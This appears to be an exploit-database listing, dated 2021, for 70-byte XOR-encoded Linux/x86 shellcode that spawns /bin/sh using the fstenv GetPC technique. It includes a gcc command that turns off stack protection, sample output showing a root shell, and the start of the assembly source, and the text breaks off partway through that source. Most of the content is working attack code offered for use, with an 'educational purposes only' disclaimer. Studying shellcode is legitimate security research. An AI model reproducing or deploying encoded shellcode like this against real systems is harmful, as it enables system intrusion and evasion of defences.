Exploits / Vulnerability Discovered : 2021-06-10 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability Linux/x86 execve /bin/sh shellcode (fstenv eip getpc technique) (70 bytes, xor encoded) is for educational purposes only and if it is used you will do on your own risk!
/***
shellcode with XOR decoder stub and fstenv MMX FPU
spawning a /bin/sh shell
uses the fstenv GetPC technique to get the memory address dynamically
(alternative to jmp-call-pop)
Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
./mmx-xor-decoder_eip
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
PID TTY TIME CMD
24045 pts/4 00:00:00 sh
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
/***
; shellcode assembly
global _start
section .text
_start:
fldz
fstenv [esp-0xc]
pop edi ; put eip into edi
add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)